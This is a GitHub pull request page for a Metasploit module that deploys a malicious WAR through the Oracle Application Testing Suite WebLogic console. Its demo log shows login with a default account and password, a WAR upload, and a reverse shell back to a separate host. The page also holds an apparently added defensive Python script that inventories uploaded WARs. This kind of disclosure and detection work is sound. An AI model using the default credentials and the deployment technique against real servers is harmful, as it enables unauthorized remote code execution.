
Add Exploit: Oracle Application Testing Suite WebLogic Server Administration Console War Deployment #11846

Merged
merged 10 commits into from May 24, 2019

4 participants
@wchen-r7
Contributor

commented May 16, 2019

Background

This module abuses a feature in Oracle Application Testing Suite WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required; however, by default, Oracle ships with an "oats" account that you could log in with, which grants you administrator access.

Setup

The following is the exact setup I used to test and analyze the vulnerability:

  • Windows Server 2008 R2 x64 (other Windows systems are also supported)
    • .Net Framework 3.5 enabled (from add/remove features)
    • IE ESC (from Server Manager) disabled
    • 8GB of RAM (at least more than 4GB will be used to run OATS)
    • Duel-Core processor
  • oats-win64-full-13.3.0.1.262.zip (x86 did not work for me)
  • Jdk-7u21-windows-x64.exe
  • OracleXE112_Win64.zip (Newer version 18c did not work well for me)
  • Firefox (I had to install this because IE on Win2k8 is completely outdated)
  • Adobe Flash installed (IE ESC needs to be disabled in order to install this)

For installation instructions, please refer to the Oracle Application Testing Suite Installation Guide.

Verification

  • Install OATS by following the instructions above
  • Load the Metasploit module
  • Set the rhosts, HttpUsername, and HttpPassword
  • run

Demo

msf5 exploit(windows/http/oats_weblogic_console) > check
[*] 172.16.135.128:8088 - The target service is running, but could not be validated.
msf5 exploit(windows/http/oats_weblogic_console) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as oats:VeryPhat1337
[*] Ready for war. Codename "lawrence" at 6256 bytes
[*] FRSC value: 0x59c5c771ae7d83c8440d7c45d2610dca5a0aa304a9e89e4c
[*] Server replies: "The file lawrence.war has been uploaded successfully to C:\\OracleATS\\oats\\servers\\AdminServer\\upload"
[+] Operation "lawrence" is a go!
[*] Code 200 on "lawrence" request
[*] Sending stage (53866 bytes) to 172.16.135.128
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49337) at 2019-05-18 18:07:27 -0500
[+] Successfully undeployed lawrence.war

meterpreter >
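The demo above shows the Administration Console writing the uploaded archive to the AdminServer upload directory before deploying it. As an added defender-side check (not part of this PR or the Metasploit module), the script below inventories that directory for WAR archives whose hash is not on an allowlist and lists the entries inside each that could execute server-side code. The upload path is taken from the demo output and treated as an assumed default; `make_constructed_war` only builds a constructed sample so the check can run offline.

```python
import hashlib
import os
import zipfile
from datetime import datetime, timezone

# Upload location as reported in the demo output above; assumption: the real
# path depends on the OATS install root, so treat this as a default only.
UPLOAD_DIR = r"C:\OracleATS\oats\servers\AdminServer\upload"
# Archive entries that can run server-side code once the WAR is deployed.
CODE_SUFFIXES = (".jsp", ".jspx", ".class", ".jar")

def sha256_of(path):
    """SHA-256 of a file, read in chunks so large archives stay out of memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def inspect_war(path):
    """Entry names inside a WAR that could execute server-side code."""
    with zipfile.ZipFile(path) as archive:
        return sorted(n for n in archive.namelist()
                      if n.lower().endswith(CODE_SUFFIXES))

def find_unexpected_wars(upload_dir, allowlist):
    """Walk upload_dir; report each .war whose SHA-256 is not in allowlist."""
    findings = []
    for root, _dirs, files in os.walk(upload_dir):
        for name in files:
            if not name.lower().endswith(".war"):
                continue
            full = os.path.join(root, name)
            digest = sha256_of(full)
            if digest in allowlist:
                continue  # known, approved deployment
            modified = datetime.fromtimestamp(os.path.getmtime(full), timezone.utc)
            findings.append({"path": full, "sha256": digest,
                             "modified": modified.isoformat(),
                             "code_entries": inspect_war(full)})
    return findings

def make_constructed_war(directory, name="sample.war"):
    """Write a constructed WAR (descriptor plus one JSP) for an offline demo."""
    path = os.path.join(directory, name)
    with zipfile.ZipFile(path, "w") as archive:
        archive.writestr("WEB-INF/web.xml", "<web-app/>")
        archive.writestr("index.jsp", "<%-- constructed placeholder page --%>")
    return path
```

On a real server, call `find_unexpected_wars(UPLOAD_DIR, allowlist)` with the SHA-256 set of approved deployments; any finding with a non-empty `code_entries` list is worth pulling for review.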

@jrobles-r7 jrobles-r7 self-assigned this May 21, 2019

@jrobles-r7 jrobles-r7 merged commit fcd3608 into rapid7:master May 24, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request May 24, 2019

msjenkins-r7 added a commit that referenced this pull request May 24, 2019

@jrobles-r7


Contributor

commented May 24, 2019

Release Notes

The oats_weblogic_console module abuses a feature in Oracle Application Testing Suite WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required.
